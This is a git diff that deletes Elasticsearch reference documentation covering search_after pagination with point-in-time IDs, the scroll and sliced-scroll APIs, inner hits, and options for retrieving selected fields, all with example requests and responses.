-To get the next page of results, rerun the previous search using the last hit's -sort values as the `search_after` argument. If using a PIT, use the latest PIT -ID in the `pit.id` parameter. The search's `query` and `sort` arguments must -remain unchanged. If provided, the `from` argument must be `0` (default) or `-1`. 
- -[source,console] ----- -GET /_search -{ - "size": 10000, - "query": { - "match" : { - "user.id" : "elkbee" - } - }, - "pit": { - "id": "46ToAwEPbXktaW5kZXgtMDAwMDAxFnVzaTVuenpUVGQ2TFNheUxVUG5LVVEAFldicVdzOFFtVHZTZDFoWWowTGkwS0EAAAAAAAAAAAQURzZzcUszUUJ5U1NMX3Jyak5ET0wBFnVzaTVuenpUVGQ2TFNheUxVUG5LVVEAAA==", <1> - "keep_alive": "1m" - }, - "sort": [ - {"@timestamp": "asc"}, - {"tie_breaker_id": "asc"} - ], - "search_after": [ <2> - 4098435132000, - "FaslK3QBySSL_rrj9zM5" - ] -} ----- -// TEST[catch:missing] - -<1> PIT ID returned by the previous search. -<2> Sort values from the previous search's last hit. - -You can repeat this process to get additional pages of results. If using a PIT, -you can extend the PIT's retention period using the -`keep_alive` parameter of each search request. - -When you're finished, you should delete your PIT. - -[source,console] ----- -DELETE /_pit -{ - "id" : "46ToAwEPbXktaW5kZXgtMDAwMDAxFnVzaTVuenpUVGQ2TFNheUxVUG5LVVEAFldicVdzOFFtVHZTZDFoWWowTGkwS0EAAAAAAAAAAAQURzZzcUszUUJ5U1NMX3Jyak5ET0wBFnVzaTVuenpUVGQ2TFNheUxVUG5LVVEAAA==" -} ----- -// TEST[catch:missing] - - -[discrete] -[[scroll-search-results]] -=== Scroll search results - -IMPORTANT: We no longer recommend using the scroll API for deep pagination. If -you need to preserve the index state while paging through more than 10,000 hits, -use the <> parameter with a point in time (PIT). - -While a `search` request returns a single ``page'' of results, the `scroll` -API can be used to retrieve large numbers of results (or even all results) -from a single search request, in much the same way as you would use a cursor -on a traditional database. - -Scrolling is not intended for real time user requests, but rather for -processing large amounts of data, e.g. in order to reindex the contents of one -data stream or index into a new data stream or index with a different -configuration. - -.Client support for scrolling and reindexing -********************************************* - -Some of the officially supported clients provide helpers to assist with -scrolled searches and reindexing: - -Perl:: - - See https://metacpan.org/pod/Search::Elasticsearch::Client::5_0::Bulk[Search::Elasticsearch::Client::5_0::Bulk] - and https://metacpan.org/pod/Search::Elasticsearch::Client::5_0::Scroll[Search::Elasticsearch::Client::5_0::Scroll] - -Python:: - - See https://elasticsearch-py.readthedocs.org/en/master/helpers.html[elasticsearch.helpers.*] - -JavaScript:: - - See {jsclient-current}/client-helpers.html[client.helpers.*] - -********************************************* - -NOTE: The results that are returned from a scroll request reflect the state of -the data stream or index at the time that the initial `search` request was made, like a -snapshot in time. Subsequent changes to documents (index, update or delete) -will only affect later search requests. - -In order to use scrolling, the initial search request should specify the -`scroll` parameter in the query string, which tells Elasticsearch how long it -should keep the ``search context'' alive (see <>), eg `?scroll=1m`. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?scroll=1m -{ - "size": 100, - "query": { - "match": { - "message": "foo" - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -The result from the above request includes a `_scroll_id`, which should -be passed to the `scroll` API in order to retrieve the next batch of -results. 
- -[source,console] --------------------------------------------------- -POST /_search/scroll <1> -{ - "scroll" : "1m", <2> - "scroll_id" : "DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==" <3> -} --------------------------------------------------- -// TEST[continued s/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==/$body._scroll_id/] - -<1> `GET` or `POST` can be used and the URL should not include the `index` - name -- this is specified in the original `search` request instead. -<2> The `scroll` parameter tells Elasticsearch to keep the search context open - for another `1m`. -<3> The `scroll_id` parameter - -The `size` parameter allows you to configure the maximum number of hits to be -returned with each batch of results. Each call to the `scroll` API returns the -next batch of results until there are no more results left to return, ie the -`hits` array is empty. - -IMPORTANT: The initial search request and each subsequent scroll request each -return a `_scroll_id`. While the `_scroll_id` may change between requests, it doesn’t -always change — in any case, only the most recently received `_scroll_id` should be used. - -NOTE: If the request specifies aggregations, only the initial search response -will contain the aggregations results. - -NOTE: Scroll requests have optimizations that make them faster when the sort -order is `_doc`. If you want to iterate over all documents regardless of the -order, this is the most efficient option: - -[source,console] --------------------------------------------------- -GET /_search?scroll=1m -{ - "sort": [ - "_doc" - ] -} --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[scroll-search-context]] -==== Keeping the search context alive - -A scroll returns all the documents which matched the search at the time of the -initial search request. It ignores any subsequent changes to these documents. -The `scroll_id` identifies a _search context_ which keeps track of everything -that {es} needs to return the correct documents. The search context is created -by the initial request and kept alive by subsequent requests. - -The `scroll` parameter (passed to the `search` request and to every `scroll` -request) tells Elasticsearch how long it should keep the search context alive. -Its value (e.g. `1m`, see <>) does not need to be long enough to -process all data -- it just needs to be long enough to process the previous -batch of results. Each `scroll` request (with the `scroll` parameter) sets a -new expiry time. If a `scroll` request doesn't pass in the `scroll` -parameter, then the search context will be freed as part of _that_ `scroll` -request. - -Normally, the background merge process optimizes the index by merging together -smaller segments to create new, bigger segments. Once the smaller segments are -no longer needed they are deleted. This process continues during scrolling, but -an open search context prevents the old segments from being deleted since they -are still in use. - -TIP: Keeping older segments alive means that more disk space and file handles -are needed. Ensure that you have configured your nodes to have ample free file -handles. See <>. - -Additionally, if a segment contains deleted or updated documents then the -search context must keep track of whether each document in the segment was live -at the time of the initial search request. 
Ensure that your nodes have -sufficient heap space if you have many open scrolls on an index that is subject -to ongoing deletes or updates. - -NOTE: To prevent against issues caused by having too many scrolls open, the -user is not allowed to open scrolls past a certain limit. By default, the -maximum number of open scrolls is 500. This limit can be updated with the -`search.max_open_scroll_context` cluster setting. - -You can check how many search contexts are open with the -<>: - -[source,console] ---------------------------------------- -GET /_nodes/stats/indices/search ---------------------------------------- - -[discrete] -[[clear-scroll]] -==== Clear scroll - -Search context are automatically removed when the `scroll` timeout has been -exceeded. However keeping scrolls open has a cost, as discussed in the -<> so scrolls should be explicitly -cleared as soon as the scroll is not being used anymore using the -`clear-scroll` API: - -[source,console] ---------------------------------------- -DELETE /_search/scroll -{ - "scroll_id" : "DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==" -} ---------------------------------------- -// TEST[catch:missing] - -Multiple scroll IDs can be passed as array: - -[source,console] ---------------------------------------- -DELETE /_search/scroll -{ - "scroll_id" : [ - "DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==", - "DnF1ZXJ5VGhlbkZldGNoBQAAAAAAAAABFmtSWWRRWUJrU2o2ZExpSGJCVmQxYUEAAAAAAAAAAxZrUllkUVlCa1NqNmRMaUhiQlZkMWFBAAAAAAAAAAIWa1JZZFFZQmtTajZkTGlIYkJWZDFhQQAAAAAAAAAFFmtSWWRRWUJrU2o2ZExpSGJCVmQxYUEAAAAAAAAABBZrUllkUVlCa1NqNmRMaUhiQlZkMWFB" - ] -} ---------------------------------------- -// TEST[catch:missing] - -All search contexts can be cleared with the `_all` parameter: - -[source,console] ---------------------------------------- -DELETE /_search/scroll/_all ---------------------------------------- - -The `scroll_id` can also be passed as a query string parameter or in the request body. -Multiple scroll IDs can be passed as comma separated values: - -[source,console] ---------------------------------------- -DELETE /_search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==,DnF1ZXJ5VGhlbkZldGNoBQAAAAAAAAABFmtSWWRRWUJrU2o2ZExpSGJCVmQxYUEAAAAAAAAAAxZrUllkUVlCa1NqNmRMaUhiQlZkMWFBAAAAAAAAAAIWa1JZZFFZQmtTajZkTGlIYkJWZDFhQQAAAAAAAAAFFmtSWWRRWUJrU2o2ZExpSGJCVmQxYUEAAAAAAAAABBZrUllkUVlCa1NqNmRMaUhiQlZkMWFB ---------------------------------------- -// TEST[catch:missing] - -[discrete] -[[slice-scroll]] -==== Sliced scroll - -For scroll queries that return a lot of documents it is possible to split the scroll in multiple slices which -can be consumed independently: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search?scroll=1m -{ - "slice": { - "id": 0, <1> - "max": 2 <2> - }, - "query": { - "match": { - "message": "foo" - } - } -} -GET /my-index-000001/_search?scroll=1m -{ - "slice": { - "id": 1, - "max": 2 - }, - "query": { - "match": { - "message": "foo" - } - } -} --------------------------------------------------- -// TEST[setup:my_index_big] - -<1> The id of the slice -<2> The maximum number of slices - -The result from the first request returned documents that belong to the first slice (id: 0) and the result from the -second request returned documents that belong to the second slice. Since the maximum number of slices is set to 2 - the union of the results of the two requests is equivalent to the results of a scroll query without slicing. 
-By default the splitting is done on the shards first and then locally on each shard using the _id field -with the following formula: -`slice(doc) = floorMod(hashCode(doc._id), max)` -For instance if the number of shards is equal to 2 and the user requested 4 slices then the slices 0 and 2 are assigned -to the first shard and the slices 1 and 3 are assigned to the second shard. - -Each scroll is independent and can be processed in parallel like any scroll request. - -NOTE: If the number of slices is bigger than the number of shards the slice filter is very slow on the first calls, it has a complexity of O(N) and a memory cost equals -to N bits per slice where N is the total number of documents in the shard. -After few calls the filter should be cached and subsequent calls should be faster but you should limit the number of - sliced query you perform in parallel to avoid the memory explosion. - -To avoid this cost entirely it is possible to use the `doc_values` of another field to do the slicing -but the user must ensure that the field has the following properties: - - * The field is numeric. - - * `doc_values` are enabled on that field - - * Every document should contain a single value. If a document has multiple values for the specified field, the first value is used. - - * The value for each document should be set once when the document is created and never updated. This ensures that each -slice gets deterministic results. - - * The cardinality of the field should be high. This ensures that each slice gets approximately the same amount of documents. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search?scroll=1m -{ - "slice": { - "field": "@timestamp", - "id": 0, - "max": 10 - }, - "query": { - "match": { - "message": "foo" - } - } -} --------------------------------------------------- -// TEST[setup:my_index_big] - -For append only time-based indices, the `timestamp` field can be used safely. - -NOTE: By default the maximum number of slices allowed per scroll is limited to 1024. -You can update the `index.max_slices_per_scroll` index setting to bypass this limit. diff --git a/docs/reference/search/search-your-data/retrieve-inner-hits.asciidoc b/docs/reference/search/search-your-data/retrieve-inner-hits.asciidoc deleted file mode 100644 index ca7e7a81729..00000000000 --- a/docs/reference/search/search-your-data/retrieve-inner-hits.asciidoc +++ /dev/null @@ -1,552 +0,0 @@ -[[inner-hits]] -== Retrieve inner hits - -The <> and <> features allow the return of documents that -have matches in a different scope. In the parent/child case, parent documents are returned based on matches in child -documents or child documents are returned based on matches in parent documents. In the nested case, documents are returned -based on matches in nested inner objects. - -In both cases, the actual matches in the different scopes that caused a document to be returned are hidden. In many cases, -it's very useful to know which inner nested objects (in the case of nested) or children/parent documents (in the case -of parent/child) caused certain information to be returned. The inner hits feature can be used for this. This feature -returns per search hit in the search response additional nested hits that caused a search hit to match in a different scope. - -Inner hits can be used by defining an `inner_hits` definition on a `nested`, `has_child` or `has_parent` query and filter. 
-The structure looks like this: - -[source,js] --------------------------------------------------- -"" : { - "inner_hits" : { - - } -} --------------------------------------------------- -// NOTCONSOLE - -If `inner_hits` is defined on a query that supports it then each search hit will contain an `inner_hits` json object with the following structure: - -[source,js] --------------------------------------------------- -"hits": [ - { - "_index": ..., - "_type": ..., - "_id": ..., - "inner_hits": { - "": { - "hits": { - "total": ..., - "hits": [ - { - "_type": ..., - "_id": ..., - ... - }, - ... - ] - } - } - }, - ... - }, - ... -] --------------------------------------------------- -// NOTCONSOLE - -[discrete] -[[inner-hits-options]] -=== Options - -Inner hits support the following options: - -[horizontal] -`from`:: The offset from where the first hit to fetch for each `inner_hits` in the returned regular search hits. -`size`:: The maximum number of hits to return per `inner_hits`. By default the top three matching hits are returned. -`sort`:: How the inner hits should be sorted per `inner_hits`. By default the hits are sorted by the score. -`name`:: The name to be used for the particular inner hit definition in the response. Useful when multiple inner hits - have been defined in a single search request. The default depends in which query the inner hit is defined. - For `has_child` query and filter this is the child type, `has_parent` query and filter this is the parent type - and the nested query and filter this is the nested path. - -Inner hits also supports the following per document features: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[nested-inner-hits]] -=== Nested inner hits - -The nested `inner_hits` can be used to include nested inner objects as inner hits to a search hit. - -[source,console] --------------------------------------------------- -PUT test -{ - "mappings": { - "properties": { - "comments": { - "type": "nested" - } - } - } -} - -PUT test/_doc/1?refresh -{ - "title": "Test title", - "comments": [ - { - "author": "kimchy", - "number": 1 - }, - { - "author": "nik9000", - "number": 2 - } - ] -} - -POST test/_search -{ - "query": { - "nested": { - "path": "comments", - "query": { - "match": { "comments.number": 2 } - }, - "inner_hits": {} <1> - } - } -} --------------------------------------------------- - -<1> The inner hit definition in the nested query. No other options need to be defined. - -An example of a response snippet that could be generated from the above search request: - -[source,console-result] --------------------------------------------------- -{ - ..., - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.0, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_score": 1.0, - "_source": ..., - "inner_hits": { - "comments": { <1> - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.0, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_nested": { - "field": "comments", - "offset": 1 - }, - "_score": 1.0, - "_source": { - "author": "nik9000", - "number": 2 - } - } - ] - } - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_source": \.\.\./"_source": $body.hits.hits.0._source/] -// TESTRESPONSE[s/\.\.\./"timed_out": false, "took": $body.took, "_shards": $body._shards/] - -<1> The name used in the inner hit definition in the search request. A custom key can be used via the `name` option. 
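-
-As a short, hypothetical variation on the example above (shown only as a query
-fragment, not a complete request), the `name` option changes the key under which
-the inner hits are returned:
-
-[source,js]
---------------------------------------------------
-"nested": {
-  "path": "comments",
-  "query": { "match": { "comments.number": 2 } },
-  "inner_hits": { "name": "popular_comments" } <1>
-}
---------------------------------------------------
-// NOTCONSOLE
-
-<1> With this made-up name, the hits appear under `inner_hits.popular_comments`
-in the response instead of the default `inner_hits.comments`.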
- -The `_nested` metadata is crucial in the above example, because it defines from what inner nested object this inner hit -came from. The `field` defines the object array field the nested hit is from and the `offset` relative to its location -in the `_source`. Due to sorting and scoring the actual location of the hit objects in the `inner_hits` is usually -different than the location a nested inner object was defined. - -By default the `_source` is returned also for the hit objects in `inner_hits`, but this can be changed. Either via -`_source` filtering feature part of the source can be returned or be disabled. If stored fields are defined on the -nested level these can also be returned via the `fields` feature. - -An important default is that the `_source` returned in hits inside `inner_hits` is relative to the `_nested` metadata. -So in the above example only the comment part is returned per nested hit and not the entire source of the top level -document that contained the comment. - -[discrete] -[[nested-inner-hits-source]] -==== Nested inner hits and +_source+ - -Nested document don't have a `_source` field, because the entire source of document is stored with the root document under -its `_source` field. To include the source of just the nested document, the source of the root document is parsed and just -the relevant bit for the nested document is included as source in the inner hit. Doing this for each matching nested document -has an impact on the time it takes to execute the entire search request, especially when `size` and the inner hits' `size` -are set higher than the default. To avoid the relatively expensive source extraction for nested inner hits, one can disable -including the source and solely rely on doc values fields. Like this: - -[source,console] --------------------------------------------------- -PUT test -{ - "mappings": { - "properties": { - "comments": { - "type": "nested" - } - } - } -} - -PUT test/_doc/1?refresh -{ - "title": "Test title", - "comments": [ - { - "author": "kimchy", - "text": "comment text" - }, - { - "author": "nik9000", - "text": "words words words" - } - ] -} - -POST test/_search -{ - "query": { - "nested": { - "path": "comments", - "query": { - "match": { "comments.text": "words" } - }, - "inner_hits": { - "_source": false, - "docvalue_fields": [ - "comments.text.keyword" - ] - } - } - } -} --------------------------------------------------- - -//// - -Response not included in text but tested for completeness sake. - -[source,console-result] --------------------------------------------------- -{ - ..., - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.0444684, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_score": 1.0444684, - "_source": ..., - "inner_hits": { - "comments": { <1> - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.0444684, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_nested": { - "field": "comments", - "offset": 1 - }, - "_score": 1.0444684, - "fields": { - "comments.text.keyword": [ - "words words words" - ] - } - } - ] - } - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_source": \.\.\./"_source": $body.hits.hits.0._source/] -// TESTRESPONSE[s/\.\.\./"timed_out": false, "took": $body.took, "_shards": $body._shards/] - -//// - -[discrete] -[[hierarchical-nested-inner-hits]] -=== Hierarchical levels of nested object fields and inner hits. 
- -If a mapping has multiple levels of hierarchical nested object fields each level can be accessed via dot notated path. -For example if there is a `comments` nested field that contains a `votes` nested field and votes should directly be returned -with the root hits then the following path can be defined: - -[source,console] --------------------------------------------------- -PUT test -{ - "mappings": { - "properties": { - "comments": { - "type": "nested", - "properties": { - "votes": { - "type": "nested" - } - } - } - } - } -} - -PUT test/_doc/1?refresh -{ - "title": "Test title", - "comments": [ - { - "author": "kimchy", - "text": "comment text", - "votes": [] - }, - { - "author": "nik9000", - "text": "words words words", - "votes": [ - {"value": 1 , "voter": "kimchy"}, - {"value": -1, "voter": "other"} - ] - } - ] -} - -POST test/_search -{ - "query": { - "nested": { - "path": "comments.votes", - "query": { - "match": { - "comments.votes.voter": "kimchy" - } - }, - "inner_hits" : {} - } - } -} --------------------------------------------------- - -Which would look like: - -[source,console-result] --------------------------------------------------- -{ - ..., - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.6931471, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_score": 0.6931471, - "_source": ..., - "inner_hits": { - "comments.votes": { <1> - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.6931471, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_nested": { - "field": "comments", - "offset": 1, - "_nested": { - "field": "votes", - "offset": 0 - } - }, - "_score": 0.6931471, - "_source": { - "value": 1, - "voter": "kimchy" - } - } - ] - } - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_source": \.\.\./"_source": $body.hits.hits.0._source/] -// TESTRESPONSE[s/\.\.\./"timed_out": false, "took": $body.took, "_shards": $body._shards/] - -This indirect referencing is only supported for nested inner hits. - -[discrete] -[[parent-child-inner-hits]] -=== Parent/child inner hits - -The parent/child `inner_hits` can be used to include parent or child: - -[source,console] --------------------------------------------------- -PUT test -{ - "mappings": { - "properties": { - "my_join_field": { - "type": "join", - "relations": { - "my_parent": "my_child" - } - } - } - } -} - -PUT test/_doc/1?refresh -{ - "number": 1, - "my_join_field": "my_parent" -} - -PUT test/_doc/2?routing=1&refresh -{ - "number": 1, - "my_join_field": { - "name": "my_child", - "parent": "1" - } -} - -POST test/_search -{ - "query": { - "has_child": { - "type": "my_child", - "query": { - "match": { - "number": 1 - } - }, - "inner_hits": {} <1> - } - } -} --------------------------------------------------- - -<1> The inner hit definition like in the nested example. 
- -An example of a response snippet that could be generated from the above search request: - -[source,console-result] --------------------------------------------------- -{ - ..., - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.0, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_score": 1.0, - "_source": { - "number": 1, - "my_join_field": "my_parent" - }, - "inner_hits": { - "my_child": { - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.0, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "2", - "_score": 1.0, - "_routing": "1", - "_source": { - "number": 1, - "my_join_field": { - "name": "my_child", - "parent": "1" - } - } - } - ] - } - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_source": \.\.\./"_source": $body.hits.hits.0._source/] -// TESTRESPONSE[s/\.\.\./"timed_out": false, "took": $body.took, "_shards": $body._shards/] diff --git a/docs/reference/search/search-your-data/retrieve-selected-fields.asciidoc b/docs/reference/search/search-your-data/retrieve-selected-fields.asciidoc deleted file mode 100644 index ee4a90c4507..00000000000 --- a/docs/reference/search/search-your-data/retrieve-selected-fields.asciidoc +++ /dev/null @@ -1,456 +0,0 @@ -[[search-fields]] -== Retrieve selected fields from a search -++++ -Retrieve selected fields -++++ - -By default, each hit in the search response includes the document -<>, which is the entire JSON object that was -provided when indexing the document. To retrieve specific fields in the search -response, you can use the `fields` parameter: - -[source,console] ----- -POST my-index-000001/_search -{ - "query": { - "match": { - "message": "foo" - } - }, - "fields": ["user.id", "@timestamp"], - "_source": false -} ----- -// TEST[setup:my_index] - -The `fields` parameter consults both a document's `_source` and the index -mappings to load and return values. Because it makes use of the mappings, -`fields` has some advantages over referencing the `_source` directly: it -accepts <> and <>, and -also formats field values like dates in a consistent way. - -A document's `_source` is stored as a single field in Lucene. So the whole -`_source` object must be loaded and parsed even if only a small number of -fields are requested. To avoid this limitation, you can try another option for -loading fields: - -* Use the <> -parameter to get values for selected fields. This can be a good -choice when returning a fairly small number of fields that support doc values, -such as keywords and dates. -* Use the <> parameter to -get the values for specific stored fields (fields that use the -<> mapping option). - -If needed, you can use the <> parameter to -transform field values in the response using a script. However, scripts can’t -make use of {es}'s index structures or related optimizations. This can sometimes -result in slower search speeds. - -You can find more detailed information on each of these methods in the -following sections: - -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[search-fields-param]] -=== Fields -beta::[] - -The `fields` parameter allows for retrieving a list of document fields in -the search response. It consults both the document `_source` and the index -mappings to return each value in a standardized way that matches its mapping -type. By default, date fields are formatted according to the -<> parameter in their mappings. 
- -The following search request uses the `fields` parameter to retrieve values -for the `user.id` field, all fields starting with `http.response.`, and the -`@timestamp` field: - -[source,console] ----- -POST my-index-000001/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - }, - "fields": [ - "user.id", - "http.response.*", <1> - { - "field": "@timestamp", - "format": "epoch_millis" <2> - } - ], - "_source": false -} ----- -// TEST[setup:my_index] - -<1> Both full field names and wildcard patterns are accepted. -<2> Using object notation, you can pass a `format` parameter to apply a custom - format for the field's values. The date fields - <> and <> accept a - <>. <> - accept either `geojson` for http://www.geojson.org[GeoJSON] (the default) - or `wkt` for - {wikipedia}/Well-known_text_representation_of_geometry[Well Known Text]. - Other field types do not support the `format` parameter. - -The values are returned as a flat list in the `fields` section in each hit: - -[source,console-result] ----- -{ - "took" : 2, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 1, - "relation" : "eq" - }, - "max_score" : 1.0, - "hits" : [ - { - "_index" : "my-index-000001", - "_id" : "0", - "_score" : 1.0, - "_type" : "_doc", - "fields" : { - "user.id" : [ - "kimchy" - ], - "@timestamp" : [ - "4098435132000" - ], - "http.response.bytes": [ - 1070000 - ], - "http.response.status_code": [ - 200 - ] - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took" : 2/"took": $body.took/] -// TESTRESPONSE[s/"max_score" : 1.0/"max_score" : $body.hits.max_score/] -// TESTRESPONSE[s/"_score" : 1.0/"_score" : $body.hits.hits.0._score/] - -Only leaf fields are returned -- `fields` does not allow for fetching entire -objects. - -The `fields` parameter handles field types like <> and -<> whose values aren't always present in -the `_source`. Other mapping options are also respected, including -<>, <> and -<>. - -NOTE: The `fields` response always returns an array of values for each field, -even when there is a single value in the `_source`. This is because {es} has -no dedicated array type, and any field could contain multiple values. The -`fields` parameter also does not guarantee that array values are returned in -a specific order. See the mapping documentation on <> for more -background. - - - -[discrete] -[[docvalue-fields]] -=== Doc value fields - -You can use the <> parameter to return -<> for one or more fields in the search response. - -Doc values store the same values as the `_source` but in an on-disk, -column-based structure that's optimized for sorting and aggregations. Since each -field is stored separately, {es} only reads the field values that were requested -and can avoid loading the whole document `_source`. - -Doc values are stored for supported fields by default. However, doc values are -not supported for <> or -{plugins}/mapper-annotated-text-usage.html[`text_annotated`] fields. - -The following search request uses the `docvalue_fields` parameter to retrieve -doc values for the `user.id` field, all fields starting with `http.response.`, and the -`@timestamp` field: - -[source,console] ----- -GET my-index-000001/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - }, - "docvalue_fields": [ - "user.id", - "http.response.*", <1> - { - "field": "date", - "format": "epoch_millis" <2> - } - ] -} ----- -// TEST[setup:my_index] - -<1> Both full field names and wildcard patterns are accepted. 
-<2> Using object notation, you can pass a `format` parameter to apply a custom - format for the field's doc values. <> support a - <>. <> support a - https://docs.oracle.com/javase/8/docs/api/java/text/DecimalFormat.html[DecimalFormat - pattern]. Other field datatypes do not support the `format` parameter. - -TIP: You cannot use the `docvalue_fields` parameter to retrieve doc values for -nested objects. If you specify a nested object, the search returns an empty -array (`[ ]`) for the field. To access nested fields, use the -<> parameter's `docvalue_fields` -property. - -[discrete] -[[stored-fields]] -=== Stored fields - -It's also possible to store an individual field's values by using the -<> mapping option. You can use the -`stored_fields` parameter to include these stored values in the search response. - -WARNING: The `stored_fields` parameter is for fields that are explicitly marked as -stored in the mapping, which is off by default and generally not recommended. -Use <> instead to select -subsets of the original source document to be returned. - -Allows to selectively load specific stored fields for each document represented -by a search hit. - -[source,console] --------------------------------------------------- -GET /_search -{ - "stored_fields" : ["user", "postDate"], - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- - -`*` can be used to load all stored fields from the document. - -An empty array will cause only the `_id` and `_type` for each hit to be -returned, for example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "stored_fields" : [], - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- - -If the requested fields are not stored (`store` mapping set to `false`), they will be ignored. - -Stored field values fetched from the document itself are always returned as an array. On the contrary, metadata fields like `_routing` are never returned as an array. - -Also only leaf fields can be returned via the `stored_fields` option. If an object field is specified, it will be ignored. - -NOTE: On its own, `stored_fields` cannot be used to load fields in nested -objects -- if a field contains a nested object in its path, then no data will -be returned for that stored field. To access nested fields, `stored_fields` -must be used within an <> block. - -[discrete] -[[disable-stored-fields]] -==== Disable stored fields - -To disable the stored fields (and metadata fields) entirely use: `_none_`: - -[source,console] --------------------------------------------------- -GET /_search -{ - "stored_fields": "_none_", - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- - -NOTE: <> and <> parameters cannot be activated if `_none_` is used. - -[discrete] -[[source-filtering]] -=== Source filtering - -You can use the `_source` parameter to select what fields of the source are -returned. This is called _source filtering_. - -The following search API request sets the `_source` request body parameter to -`false`. The document source is not included in the response. - -[source,console] ----- -GET /_search -{ - "_source": false, - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- - -To return only a subset of source fields, specify a wildcard (`*`) pattern in -the `_source` parameter. The following search API request returns the source for -only the `obj` field and its properties. 
- -[source,console] ----- -GET /_search -{ - "_source": "obj.*", - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- - -You can also specify an array of wildcard patterns in the `_source` field. The -following search API request returns the source for only the `obj1` and -`obj2` fields and their properties. - -[source,console] ----- -GET /_search -{ - "_source": [ "obj1.*", "obj2.*" ], - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- - -For finer control, you can specify an object containing arrays of `includes` and -`excludes` patterns in the `_source` parameter. - -If the `includes` property is specified, only source fields that match one of -its patterns are returned. You can exclude fields from this subset using the -`excludes` property. - -If the `includes` property is not specified, the entire document source is -returned, excluding any fields that match a pattern in the `excludes` property. - -The following search API request returns the source for only the `obj1` and -`obj2` fields and their properties, excluding any child `description` fields. - -[source,console] ----- -GET /_search -{ - "_source": { - "includes": [ "obj1.*", "obj2.*" ], - "excludes": [ "*.description" ] - }, - "query": { - "term": { - "user.id": "kimchy" - } - } -} ----- - -[discrete] -[[script-fields]] -=== Script fields - -You can use the `script_fields` parameter to retrieve a <> (based on different fields) for each hit. For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_all": {} - }, - "script_fields": { - "test1": { - "script": { - "lang": "painless", - "source": "doc['price'].value * 2" - } - }, - "test2": { - "script": { - "lang": "painless", - "source": "doc['price'].value * params.factor", - "params": { - "factor": 2.0 - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Script fields can work on fields that are not stored (`price` in -the above case), and allow to return custom values to be returned (the -evaluated value of the script). - -Script fields can also access the actual `_source` document and -extract specific elements to be returned from it by using `params['_source']`. -Here is an example: - -[source,console] --------------------------------------------------- -GET /_search - { - "query" : { - "match_all": {} - }, - "script_fields" : { - "test1" : { - "script" : "params['_source']['message']" - } - } - } --------------------------------------------------- -// TEST[setup:my_index] - -Note the `_source` keyword here to navigate the json-like model. - -It's important to understand the difference between -`doc['my_field'].value` and `params['_source']['my_field']`. The first, -using the doc keyword, will cause the terms for that field to be loaded to -memory (cached), which will result in faster execution, but more memory -consumption. Also, the `doc[...]` notation only allows for simple valued -fields (you can't return a json object from it) and makes sense only for -non-analyzed or single term based fields. However, using `doc` is -still the recommended way to access values from the document, if at all -possible, because `_source` must be loaded and parsed every time it's used. -Using `_source` is very slow. 
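-
-To make the trade-off concrete, here is a minimal, untested sketch that reuses
-the `price` and `message` fields from the examples above and fetches one value
-through doc values and another through `_source` in the same request:
-
-[source,js]
---------------------------------------------------
-GET /_search
-{
-  "query": { "match_all": {} },
-  "script_fields": {
-    "discounted_price": {
-      "script": "doc['price'].value * 0.9" <1>
-    },
-    "raw_message": {
-      "script": "params['_source']['message']" <2>
-    }
-  }
-}
---------------------------------------------------
-// NOTCONSOLE
-
-<1> Reads the field's doc values: fast and cached, but limited to simple values.
-<2> Loads and parses the whole `_source` for every hit: flexible, but much slower.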
